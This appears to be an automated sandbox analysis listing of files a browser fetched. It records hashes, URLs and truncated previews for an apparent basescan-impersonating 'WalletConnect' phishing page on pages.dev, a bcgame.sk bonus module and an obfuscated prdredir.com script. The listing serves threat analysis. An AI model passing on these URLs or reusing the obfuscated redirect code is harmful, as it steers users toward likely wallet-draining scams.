                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (36908)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):36909
                                                                                                                                                                                                                                              Entropy (8bit):4.1893337868179055
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:jEFiW2B8B/h/i5GdQxMvi0uQrjN+uq0hX:jEFiW2KRh/eOwQ3YuqUX
                                                                                                                                                                                                                                              MD5:0B35203656FDE7B5F83CB61B742275C4
                                                                                                                                                                                                                                              SHA1:97D95427143BB52AC8B8FAF8C9AD13ACD0F39EA5
                                                                                                                                                                                                                                              SHA-256:C062C65E426BC6FA59A742DD6F4226AB6F58E4D84D3F155C2B4780B218F4EE6D
                                                                                                                                                                                                                                              SHA-512:36044F4301BBC633FFBFA29A91DE67B1B914F85D8851E09C8CFA20E70BCE5F7751827DCCED845000780AA56A9546C57F7FE721831A0BDC0F8B03A51A48C82C51
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-c0147582.js
                                                                                                                                                                                                                                              Preview:var d=Object.defineProperty;var r=Object.getOwnPropertySymbols;var g=Object.prototype.hasOwnProperty,M=Object.prototype.propertyIsEnumerable;var o=(s,L,t)=>L in s?d(s,L,{enumerable:!0,configurable:!0,writable:!0,value:t}):s[L]=t,e=(s,L)=>{for(var t in L||(L={}))g.call(L,t)&&o(s,t,L[t]);if(r)for(var t of r(L))M.call(L,t)&&o(s,t,L[t]);return s};import{j as i,b as Z,i as n,t as C}from"./web-13cf6287.js";import{e as p,c as V}from"./manifest-51a3674f.js";import{i as h,c as m,m as H}from"./solid-js-38561dfe.js";var u=C("<svg>"),f=C('<svg><path d="M19.6912 5.6001L9.2912 16.0001L19.6912 26.4001L22.7088 23.3825L15.3264 16.0001L22.7088 8.6177L19.6912 5.6001Z"></svg>',!1,!0),_=C('<svg><g id=share_media/telegram><path id=vector d="M4.90694 15.2947L26.2758 5.47633C27.0847 5.10485 28.0305 5.4855 28.3877 6.32673C28.515 6.62491 28.5543 6.95474 28.5022 7.27707L25.6344 24.999C25.4582 26.0876 24.4667 26.8222 23.42 26.639C23.1213 26.5865 22.8386 26.4616 22.5952 26.2741L15.3683 20.7061C14.6572 20.1589 14.5
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):6365
                                                                                                                                                                                                                                              Entropy (8bit):7.8965403628961175
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:rGMz4DCvCtM/2svHiAaMRaH3511oqSGiI:rGKKjiHmtzSGiI
                                                                                                                                                                                                                                              MD5:8C09B42D62B8FA6AF9F655D2A64F75F3
                                                                                                                                                                                                                                              SHA1:8E2AFD18605214D673CC52BC21A4ECED0137C8AB
                                                                                                                                                                                                                                              SHA-256:D5040A78B49ED1C8E2E854495CD0BC86DC39C130ECFA18561E09F90C7D121CD0
                                                                                                                                                                                                                                              SHA-512:40B9DA7828AC58AA4E3DDD67989150C4E94BEF2563A6D4C7E8BB839F7F8FC49609611C6D8281275B8250B157C800939F1B39C51BFCEDD9A41321928F104A6F17
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@................... .....................8iinf..........infe........av01.....infe........av01.....iprp....ipco....colrnclx...........av1C........ispe...........Z....pixi.........8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....av1C........pixi............ipma..........................iref........auxl.........=mdat.....%.{,.2.....D..VF`.K.....e$.....%.{,...h@2........g..~{..[|...j...d.....[..m.'...aF..(e.Q...]Q.....5.p..V...$.....R+....b6.b.j3....Y.......tN.....8C..d.....a.W"...U.....,...e...-.23./.=<v.(.r...D.R..........U..[8.8.....'.3..SJ+..8.....U.-q"3........k..._., .}...S....-...`..z)%G.*.......[L)w....?..."..??..w8...G=2....a...#..ao.....h.X.l....C?SE.]..`.P..'j..*..........\....a5..PcZ..fr....?L1.......D.spB.2..R/q0......K.... 7_&.@.*V.{...a..Ly.[.I....I...a.3....b..$J...d...=.a.S.,~......6.U...v..E"..y}M..".....s.?......*..U....=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 101 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):762
                                                                                                                                                                                                                                              Entropy (8bit):7.447608726724651
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:6v/7enM0eODdT6MztwXK/efMNTmHJnnWY29JJ0QHF3IVqVNS4/jlbb+QG8/kHKWg:RtN6ewXoNSHJWRHJ64/jlX+QF/CIJb9n
                                                                                                                                                                                                                                              MD5:3D671D4FD9737F6B17BBE57570B9BB8A
                                                                                                                                                                                                                                              SHA1:56F191219C36CFEE4AAA3812BCBAF1CCCE0FDDDA
                                                                                                                                                                                                                                              SHA-256:1C1E4B28390A58BB4480B5BDE347AEAC595B7D0BD31E9B8CF7055A522041CC3F
                                                                                                                                                                                                                                              SHA-512:74A26E5F3759DD778CD5F091334CE0E499662577A95129976D831CE68AFE59A157D458B8A2DD45A95D63BE92831328BF340A41A9400F5B467EE80C65964452BE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...e...d........X....gAMA......a.....sRGB.........PLTE....;;.99.PP....AA....::.G..::.E..hh........F..G..?z.::.99........F..::.E..ff.;;....99.G........RR.::.kk.F..::....Su.............p...G........::lC....7^..QQ..::....::....QQoo.Ej..99a..(R........."k'v....tRNS. ...A@`@......@. ..ph...`...+..c....IDATx..Ko.@.F/..Z..j.."..Z.Q.....K...IW.f.i.Y........0...\....P.&......T@f.93.....Vl..MFFt]I.,........].@.........B..O..V[....@,...K.C.v"Fn.j......M..=..CVlk.Qn....RTY. ..!...{L2..<W.U<G......`.....9....L2W.V.....on... .G.72(..}Is..,t..D..p(%..;.......'.+.+.04w%........I.J.Jv<~P.....b.R.&.?U.s.|_RZ..AG)..|+.Y.u...y#.F..I.._.+M.{Wqe.6...iG)AP&.X..2.w$....f.B#..BL.J..DVhy..L.~..J.._Z.a....!~....*z....IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65446), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):107749
                                                                                                                                                                                                                                              Entropy (8bit):4.986561530165959
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:u7/cnTfIbdDSRjlJTQPWVTagPShkMnJuxlk6WRIvQEtUK9G2CWKeYcftIougRuOk:uLd2oe9G2CWPtmK4Y3OFnG7KokA98J
                                                                                                                                                                                                                                              MD5:AA2460E638343A1C2E585B37C228772A
                                                                                                                                                                                                                                              SHA1:2D88F1D758611DE7375C6BB4EB9E70DE5FCAFD77
                                                                                                                                                                                                                                              SHA-256:528A1886F07E7777A6EE359F49155202A3CA8670E7F8FEB399CA186A8BF80AC6
                                                                                                                                                                                                                                              SHA-512:3EC06A5E6B1CB03015FF1991413793A9F844D4095A35899A7F6E2065DB9D486DFA4FBF31D575F9B937958A334F555825FBFB3EF53E832965539AF38FAA8CCFF1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/jquery/dist/jquery.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */..!function (e, t) { "use strict"; "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function (e) { if (!e.document) throw new Error("jQuery requires a window with a document"); return t(e) } : t(e) }("undefined" != typeof window ? window : this, function (C, e) { "use strict"; var t = [], r = Object.getPrototypeOf, s = t.slice, g = t.flat ? function (e) { return t.flat.call(e) } : function (e) { return t.concat.apply([], e) }, u = t.push, i = t.indexOf, n = {}, o = n.toString, v = n.hasOwnProperty, a = v.toString, l = a.call(Object), y = {}, m = function (e) { return "function" == typeof e && "number" != typeof e.nodeType && "function" != typeof e.item }, x = function (e) { return null != e && e === e.window }, E = C.document, c = { type: !0, src: !0, nonce: !0, noModule: !0 }; function b(e, t, n) { var r, i, o = (n = n || E).createElement("sc
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9655)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9656
                                                                                                                                                                                                                                              Entropy (8bit):5.282369994221266
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:2JMHuJCT5/sZf2j3rMuUHqO87f6clRocrfN7rYsHQWd1BcSO6n3D90EI:5Hu0N/s52j3YLf87ykRocrfGU1JOuGx
                                                                                                                                                                                                                                              MD5:C16E0BA4CD4C0965859AD51B75EF1896
                                                                                                                                                                                                                                              SHA1:768043097AE36F45D6177B4857532E32140F9490
                                                                                                                                                                                                                                              SHA-256:A0DE56DAAD4F3B8A07FB3E8DEE44AB5E20F29B5DCC435A62DA835BFFA6F6BF27
                                                                                                                                                                                                                                              SHA-512:D293E2FBAFA3F696C8465CDF2BCD1C375A98D2E25F083A4AC54A0290C8D6AED8FB9DDCAC52563CEBC2D6788A651FE81A96FD1049C7739AB5ACCB62DE66755344
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/baseService-449c2e3e.js
                                                                                                                                                                                                                                              Preview:var Oe=Object.defineProperty;var B=Object.getOwnPropertySymbols;var Ae=Object.prototype.hasOwnProperty,Se=Object.prototype.propertyIsEnumerable;var q=(e,r,t)=>r in e?Oe(e,r,{enumerable:!0,configurable:!0,writable:!0,value:t}):e[r]=t,w=(e,r)=>{for(var t in r||(r={}))Ae.call(r,t)&&q(e,t,r[t]);if(B)for(var t of B(r))Se.call(r,t)&&q(e,t,r[t]);return e};import{L as $e}from"./manifest-51a3674f.js";import{q as je,c as G,b as R,r as we,u as P,j as Pe}from"./solid-js-38561dfe.js";import{b as Ie,r as Ce,S as D}from"./_baseGetTag-c2e287b9.js";import{m as te,i as x,l as _e,e as ne,o as xe,p as Le,k as ae,q as ie,s as Me,b as Fe,r as Ee,U as H,g as L,t as S,u as oe,c as ue,S as se,n as Ue,d as Ke,a as W,h as Ne}from"./_baseFor-3fee30d6.js";import{a as j,i as I}from"./isArray-79a0be9c.js";import{i as T,g as Be,e as M,a as qe}from"./_MapCache-1fb5cc44.js";var Q=Object.create,Ge=function(){function e(){}return function(r){if(!T(r))return{};if(Q)return Q(r);e.prototype=r;var t=new e;return e.prototype=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3354)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3355
                                                                                                                                                                                                                                              Entropy (8bit):5.27208963523831
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:HbsRWM4vsfby0NA5w+/uWuWNWBfndoWKM0HZ5JqkWu:6W/kWEa8datppZ5j5
                                                                                                                                                                                                                                              MD5:581A9E3677747486A1E675B24B3CBFFE
                                                                                                                                                                                                                                              SHA1:9D692EB7FB3A3570FBC1FFDD639B27B716CC9D56
                                                                                                                                                                                                                                              SHA-256:B5AD41A38EB44CA47529D54FC933B6BD151EFDF853CA9A7A62EC00197EB8DE80
                                                                                                                                                                                                                                              SHA-512:77A22DAAE615F418C6B6338644795A235E45C513A25BA82824C08239E190E3C39BC76596EED89A25BD3A1E1D12A830A321A5DFD52A8C7269CF8C904F8D11C757
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{b as d,r as _}from"./_baseGetTag-c2e287b9.js";function l(t){var e=typeof t;return t!=null&&(e=="object"||e=="function")}var v="[object AsyncFunction]",g="[object Function]",y="[object GeneratorFunction]",b="[object Proxy]";function C(t){if(!l(t))return!1;var e=d(t);return e==g||e==y||e==v||e==b}var $=_["__core-js_shared__"];const u=$;var p=function(){var t=/[^.]+$/.exec(u&&u.keys&&u.keys.IE_PROTO||"");return t?"Symbol(src)_1."+t:""}();function O(t){return!!p&&p in t}var P=Function.prototype,j=P.toString;function w(t){if(t!=null){try{return j.call(t)}catch(e){}try{return t+""}catch(e){}}return""}var x=/[\\^$.*+?()[\]{}|]/g,m=/^\[object .+?Constructor\]$/,z=Function.prototype,S=Object.prototype,D=z.toString,H=S.hasOwnProperty,F=RegExp("^"+D.call(H).replace(x,"\\$&").replace(/hasOwnProperty|(function).*?(?=\\\()| for .+?(?=\\\])/g,"$1.*?")+"$");function I(t){if(!l(t)||O(t))return!1;var e=C(t)?F:m;return e.test(w(t))}function T(t,e){return t==null?void 0:t[e]}function f(t,e){var a=T
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):15437
                                                                                                                                                                                                                                              Entropy (8bit):7.862283886897875
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:UYNg7/c+jWDTIO3DK7LjgScGb2tBccAq1T1LsSjKtMiiZgoW:UYyw+jWD0OTK7LjJ2jc6nj9+J
                                                                                                                                                                                                                                              MD5:3A86750228B220FC6E2D6974F30C04A0
                                                                                                                                                                                                                                              SHA1:2DC22922398A81CE3A0329E6D2F34BE2D8A07678
                                                                                                                                                                                                                                              SHA-256:95064D8F8F9436BC90DCD4EBA743AF286E39CB68FD5D09FEDC44113E90A725D6
                                                                                                                                                                                                                                              SHA-512:06E138089B06B362C8054FBFD28B42DC5E4A26329B64F9BBE3837131784D9CDC53FAAEA7AF8EC36A0ED4E3179BC307B45FA067C38DEF3CC7B83D9FDC427DDA32
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/4d204e0c-db12-471d-8fd6-238df2c36ea1.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1238)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1239
                                                                                                                                                                                                                                              Entropy (8bit):5.068464054671174
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                                                                                                                                                                                                                                              MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                                                                                                                                                                                                              SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                                                                                                                                                                                                              SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                                                                                                                                                                                                              SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                                                                                                                                                                                                              Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                              Entropy (8bit):3.75
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:HKmn:qmn
                                                                                                                                                                                                                                              MD5:EC331136E75314D2030EE013B6069921
                                                                                                                                                                                                                                              SHA1:6B7428B8B15616A67F767D42964AF94FCBE2A803
                                                                                                                                                                                                                                              SHA-256:A7358DF6B7B60280F2A0D7CD5B70A9F1DFA4FCE5C31FB1A24FB2F109AF7EE977
                                                                                                                                                                                                                                              SHA-512:30C9B411C937F7D3DE9E59D8BE1CDE4F262B05C6AC2EC2D2C1956E705FE255D84DE17913826A0378B7FD4E51E075EE72A6BF16B870BF78B83D4F1D4507A44278
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAk-xPiSKaeNnxIFDQbtu_8=?alt=proto
                                                                                                                                                                                                                                              Preview:CgkKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4699)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4718
                                                                                                                                                                                                                                              Entropy (8bit):5.52798690967123
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:TURuV+G93iry/o1bzjdKiowziOgjMJgwPOi5eriEW9cJMi7x:ARAVoNdKryi8JgQArijji7x
                                                                                                                                                                                                                                              MD5:F60C73ADA591C2B97F071D996797F7A7
                                                                                                                                                                                                                                              SHA1:9622D54808392C5F70891E403F35D6A7F79B3005
                                                                                                                                                                                                                                              SHA-256:23D1A28488ED4E92499CA48C1D33888716DCBCB2175D2F65AB8425A63AF2A6C4
                                                                                                                                                                                                                                              SHA-512:99C2BFCC6029C01E64AE1CD57D60B0A43B0CC7244F399775ADCEF193EF6B33706B6ADEB822DA7572A375BCCB5D828FCA97A864F9C71D9DDAE11D767DE4158D60
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://scripts.prdredir.com/scripts/k_bcgame.js
                                                                                                                                                                                                                                              Preview:(function(){. function o(){const d=['C2nYzwu','CNbYAw4','yxrLrMK','Aw50','nZGWnJyWwMPoq1DQ','AfbHCMe','mtG2nJe1mfvZy1n0sW','AxiUy28','z2v0s2u','C0j5vge','CMvY','Aw9U','zw1LBNq','DhjPyNu','Dg9tDhi','AgvPz2G','mtqZnJa4nLzMENPetq','CMrYzwq','z2LUlxC','BMDLCNa','C2v0s2u','mJe2ote4thLOENDt','CgfYzw4','CM9ZCY0','C3LUyY8','DhLWzq','yxbWzw4','ndm3odC1ofLYDfzTzW','u3rYAw4','B1DMCw0','oI8VCgK','B3jPz2K','n2X0sevcEG','DejLzM8','Bg9Jyxq','C2vHCMm','AhjLzG','Ae11y00','Bg9JywW','yxn5BMm','y3rgAw4','ENPVs3m','z2vYChi','z2v0rwW','CMfUzg8','y29SBgu','zMXVB3i','yKHqAfO','De5Vzgu','CMvM','ndy3odeXqND5twff','C2nYAxa','C3rYAwm','zenOAwW','C2v0sxq','C2v0','mZGXnde1CxnivKz5','C2vUzfa','DgLMAwu','mJrYtMzqvhC','z2v0sxq','zw50','Dc1VCMK','yM9KEq','yMnNyw0','ChjKCMu','C3rVCMe','CMvYug8','DeLKzw4','zMLUz2u','z05HBwu','CMLUDa','D2LKDgG','mJbsEMX3yw0','AgvUlwm','EgvSlNa','CgL4zwW','u3rVCMe','ChjVDg8','C2v0qxq','Ahr0Chm','rwfksKq','z2vUzxi','rwXLBwu','zuvSzw0','Aw5Zzxi','BgLJEq'];o=function(){return d;};return o();
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):13485
                                                                                                                                                                                                                                              Entropy (8bit):7.83778977358862
                                                                                                                                                                                                                                              Encrypted:false
